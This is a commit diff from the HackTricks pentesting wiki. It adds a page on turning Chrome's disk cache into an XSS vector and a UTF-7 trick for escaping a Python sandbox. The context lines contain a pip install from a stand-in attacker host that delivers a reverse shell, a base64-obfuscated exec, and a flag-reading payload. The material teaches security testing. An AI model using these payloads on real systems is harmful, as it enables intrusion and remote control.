mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-28 15:41:34 +00:00
GitBook: [#3745] No subject
This commit is contained in:
parent
3e9dd1d479
commit
6547ca9d10
4 changed files with 74 additions and 5 deletions
|
@ -568,6 +568,7 @@
|
||||||
* [XXE - XEE - XML External Entity](pentesting-web/xxe-xee-xml-external-entity.md)
|
* [XXE - XEE - XML External Entity](pentesting-web/xxe-xee-xml-external-entity.md)
|
||||||
* [XSS (Cross Site Scripting)](pentesting-web/xss-cross-site-scripting/README.md)
|
* [XSS (Cross Site Scripting)](pentesting-web/xss-cross-site-scripting/README.md)
|
||||||
* [Abusing Service Workers](pentesting-web/xss-cross-site-scripting/abusing-service-workers.md)
|
* [Abusing Service Workers](pentesting-web/xss-cross-site-scripting/abusing-service-workers.md)
|
||||||
|
* [Chrome Cache to XSS](pentesting-web/xss-cross-site-scripting/chrome-cache-to-xss.md)
|
||||||
* [Debugging Client Side JS](pentesting-web/xss-cross-site-scripting/debugging-client-side-js.md)
|
* [Debugging Client Side JS](pentesting-web/xss-cross-site-scripting/debugging-client-side-js.md)
|
||||||
* [Dom Clobbering](pentesting-web/xss-cross-site-scripting/dom-clobbering.md)
|
* [Dom Clobbering](pentesting-web/xss-cross-site-scripting/dom-clobbering.md)
|
||||||
* [DOM XSS](pentesting-web/xss-cross-site-scripting/dom-xss.md)
|
* [DOM XSS](pentesting-web/xss-cross-site-scripting/dom-xss.md)
|
||||||
|
|
|
@ -10,13 +10,13 @@ Get Access Today:
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary><strong><a href="https://www.twitch.tv/hacktricks_live/schedule">🎙️ HackTricks LIVE Twitch</a> Wednesdays 5.30pm (UTC) 🎙️ - <a href="https://www.youtube.com/@hacktricks_LIVE">🎥 Youtube 🎥</a></strong></summary>
|
<summary><a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ HackTricks LIVE Twitch</strong></a> <strong>Wednesdays 5.30pm (UTC) 🎙️ -</strong> <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||||
|
|
||||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||||
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
@ -105,7 +105,7 @@ pip.main(["install", "http://attacker.com/Rerverse.tar.gz"])
|
||||||
|
|
||||||
You can download the package to create the reverse shell here. Please, note that before using it you should **decompress it, change the `setup.py`, and put your IP for the reverse shell**:
|
You can download the package to create the reverse shell here. Please, note that before using it you should **decompress it, change the `setup.py`, and put your IP for the reverse shell**:
|
||||||
|
|
||||||
{% file src="../../../.gitbook/assets/reverse.tar.gz" %}
|
{% file src="../../../.gitbook/assets/Reverse.tar.gz" %}
|
||||||
|
|
||||||
{% hint style="info" %}
|
{% hint style="info" %}
|
||||||
This package is called `Reverse`. However, it was specially crafted so that when you exit the reverse shell the rest of the installation will fail, so you **won't leave any extra python package installed on the server** when you leave.
|
This package is called `Reverse`. However, it was specially crafted so that when you exit the reverse shell the rest of the installation will fail, so you **won't leave any extra python package installed on the server** when you leave.
|
||||||
|
@ -151,6 +151,23 @@ exec(__import__('base64').b64decode('X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2xzJyk='))
|
||||||
## This is very useful for code injected inside "eval" as it doesn't support multiple lines or ";"
|
## This is very useful for code injected inside "eval" as it doesn't support multiple lines or ";"
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## Bypassing protections through encodings (UTF-7)
|
||||||
|
|
||||||
|
In [**this writeup**](https://blog.arkark.dev/2022/11/18/seccon-en/#misc-latexipy) UFT-7 is used to load and execute arbitrary python code inside an apparent sandbox:
|
||||||
|
|
||||||
|
```python
|
||||||
|
assert b"+AAo-".decode("utf_7") == "\n"
|
||||||
|
|
||||||
|
payload = """
|
||||||
|
# -*- coding: utf_7 -*-
|
||||||
|
def f(x):
|
||||||
|
return x
|
||||||
|
#+AAo-print(open("/flag.txt").read())
|
||||||
|
""".lstrip()
|
||||||
|
```
|
||||||
|
|
||||||
|
It is also possible to bypass it using other encodings, e.g. `raw_unicode_escape` and `unicode_escape`.
|
||||||
|
|
||||||
## Python execution without calls
|
## Python execution without calls
|
||||||
|
|
||||||
If you are inside a python jail that **doesn't allow you to make calls**, there are still some ways to **execute arbitrary functions, code** and **commands**.
|
If you are inside a python jail that **doesn't allow you to make calls**, there are still some ways to **execute arbitrary functions, code** and **commands**.
|
||||||
|
@ -1093,13 +1110,13 @@ will be bypassed
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary><strong><a href="https://www.twitch.tv/hacktricks_live/schedule">🎙️ HackTricks LIVE Twitch</a> Wednesdays 5.30pm (UTC) 🎙️ - <a href="https://www.youtube.com/@hacktricks_LIVE">🎥 Youtube 🎥</a></strong></summary>
|
<summary><a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ HackTricks LIVE Twitch</strong></a> <strong>Wednesdays 5.30pm (UTC) 🎙️ -</strong> <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||||
|
|
||||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||||
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
|
|
@ -893,6 +893,8 @@ When something like **`"some {{template}} data".replace("{{template}}", <user_in
|
||||||
|
|
||||||
For example in [**this writeup**](https://gitea.nitowa.xyz/nitowa/PlaidCTF-YACA), this was used to **scape a JSON string** inside a script and execute arbitrary code.
|
For example in [**this writeup**](https://gitea.nitowa.xyz/nitowa/PlaidCTF-YACA), this was used to **scape a JSON string** inside a script and execute arbitrary code.
|
||||||
|
|
||||||
|
### Chrome Cache to XSS
|
||||||
|
|
||||||
### XS Jails
|
### XS Jails
|
||||||
|
|
||||||
If you are only have a limited set of chars to use, check these other valid solutions for XSJail problems:
|
If you are only have a limited set of chars to use, check these other valid solutions for XSJail problems:
|
||||||
|
|
|
@ -0,0 +1,49 @@
|
||||||
|
# Chrome Cache to XSS
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ HackTricks LIVE Twitch</strong></a> <strong>Wednesdays 5.30pm (UTC) 🎙️ -</strong> <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||||
|
|
||||||
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||||
|
|
||||||
|
</details>
|
||||||
|
|
||||||
|
Technique taken [**from this writeup**](https://blog.arkark.dev/2022/11/18/seccon-en/#web-spanote)**.**
|
||||||
|
|
||||||
|
There are two important types of cache:
|
||||||
|
|
||||||
|
* **back/forward cache (bfcache)**
|
||||||
|
* ref. [https://web.dev/i18n/en/bfcache/](https://web.dev/i18n/en/bfcache/)
|
||||||
|
* It stores a complete snapshot of a page **including the JavaScript heap**.
|
||||||
|
* The cache is used for back/forward navigations.
|
||||||
|
* it has preference over disk cache
|
||||||
|
* **disk cache**
|
||||||
|
* ref. [https://www.chromium.org/developers/design-documents/network-stack/disk-cache/](https://www.chromium.org/developers/design-documents/network-stack/disk-cache/)
|
||||||
|
* It stores a resource fetched from the web. The cache **doesn't include the JavaScript heap**.
|
||||||
|
* The cache is also used for back/forward navigations to skip communication costs.
|
||||||
|
|
||||||
|
As a interesting point of disk cache, the **cache includes** not only the HTTP response rendered to a web page, but also **those fetched with `fetch`**. In other words, if you a**ccess the URL for a fetched** resource, the **browser will render the resource** on the page.
|
||||||
|
|
||||||
|
There is another important point. If both disk cache and bfcache are valid for an accessed page at back/forward navigations, the **bfcache has priority over the disk cache**. So, if you need to access a page stored in both caches but you want to use the one from the disk, you need to somehow **disable bfcache.**
|
||||||
|
|
||||||
|
### Disable bfcache
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
bfcache is disabled by [default options](https://github.com/puppeteer/puppeteer/blob/v19.2.0/packages/puppeteer-core/src/node/ChromeLauncher.ts#L175) of puppeteer.
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ HackTricks LIVE Twitch</strong></a> <strong>Wednesdays 5.30pm (UTC) 🎙️ -</strong> <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||||
|
|
||||||
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||||
|
|
||||||
|
</details>
|
Loading…
Reference in a new issue